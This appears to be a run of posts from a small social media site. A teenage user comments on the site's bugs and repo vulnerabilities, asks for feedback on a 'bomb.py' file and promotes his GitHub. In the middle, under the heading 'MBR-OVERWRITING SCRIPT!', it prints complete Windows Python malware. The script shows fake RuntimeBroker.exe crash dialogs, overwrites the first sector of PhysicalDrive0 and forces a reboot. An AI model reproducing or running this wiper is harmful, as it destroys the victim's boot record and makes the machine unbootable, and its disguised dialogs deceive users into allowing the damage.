erm, what the sigma?
Can anyone look at this repo and tell me if the BOMB/bomb.py file should have any fixes? (its still being developed, i just want opinions)
honestly, i really do fw this site and its sorta large community. It is a little buggy client side(i guess?)… hasn’t the owner spent 900$+ on it over the time it has been up??? (idk, i forgot when i was looking at it)
A little info about me: I was one of the developers for the “small social media“ site called *https://rainydais.com/*, i helped with the security, management, and development with the owner… until we had a miscommunication and he kicked me off the team :’(
anyways, i have been in lead development with small socials like this one and just want to look out for the users. please take into consideration what i have said in my recent post. @jeffalo and the rest of staff!
warning!
From the tests i have done, there are many vulnerabilities on this website, there are also a lot of bugs. Example: when posting something, if you spam click `post` it will create a post for every time you click the button, there should be an implementation to limit the time between posts and to make the button a one time click. (THIS BUG MAKES THE SITE LAG!). its also a pain to delete all of the posts if you accidentally do so as the site refreshes but will still lag and there is a small chance that the post will not be deleted. There is also a password vulnerability… maybe don’t have the user’s passwords get stored as a plain document.
THERE ARE VULNERABILITIES IN THE REPO!; Yes, even tho the repo is the legacy site and isn’t used anymore it is still good to state the vulnerabilities on the repo as people might use the template to make their own site like this and wont know of the vulnerabilities in the code:
List of the vulnerabilities on the repo: SQL Injection, Cross-Site Scripting (XSS), Insecure Direct Object Reference (IDOR), Lack of Input Validation, Insecure, Outdated Dependencies, Lack of Error Handling, Insecure Session Managemen, Storage of Sensitive Data(user and password information: Insecure Password Storage, Weak Password Hashing, Lack of Password Salting, Insecure Password Verification, Missing Password Complexity Requirements, insecure Password Reset Token Generation, insecure Password Storage in Sessions), Lack of Secure Communication… sry <3
erm, what the sigma? MBR-OVERWRITING SCRIPT!
import os import time from os import system from subprocess import call os.system('pip install pywin32') from win32file import * from win32ui import * from win32con import * from win32gui import * from sys import exit time.sleep(2) warningtitle = 'Program crashed - RuntimeBroker.exe' warningdescription = 'The instruction at 0x00007FF950FCBE4B reference memory at 0x000000000000024, The memory could not written. Would you like to restart?' if MessageBox(warningdescription, warningtitle, MB_ICONWARNING | MB_YESNO) == 7: MessageBox("RuntimeBroker.exe is very inportant, your pc could run into many falulars, would you like to restart RuntimeBroker.exe", "Alert - RuntimeBroker.exe", MB_ICONWARNING | MB_OK) hDevice = CreateFileW("\\\\.\\PhysicalDrive0", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0,0) # Create handle WriteFile(hDevice, AllocateReadBuffer(512), None) # Overwrite MBR! CloseHandle(hDevice) # Close the handle MessageBox("RuntimeBroker.exe has been fixed, please contact microsoft support if any other problems occur.", "Restarted - RuntimeBroker.exe", MB_ICONWARNING | MB_OK) time.sleep(120) MessageBox("Your PC requires a restart. (Reason: Master Boot Record(MBR) has been changed) Please click 'ok' to restart.", "System", MB_ICONWARNING | MB_OK) os.system("shutdown /r /t 1") # restartI love finding small social-media’s like this. I love looking through the communities and seeing all of the silly things people post :P
Hello, World! I’m new here :P
Check out my GitHub! https://github.com/CPScript (I personally don’t think i post anything useful there), I’m highly skilled in cyber-security, networking, machine learning, and more. I’m 17 and have multiple certifications(8/500$ each) on the skills i have. You can do anything as long as you put your mind to it! <3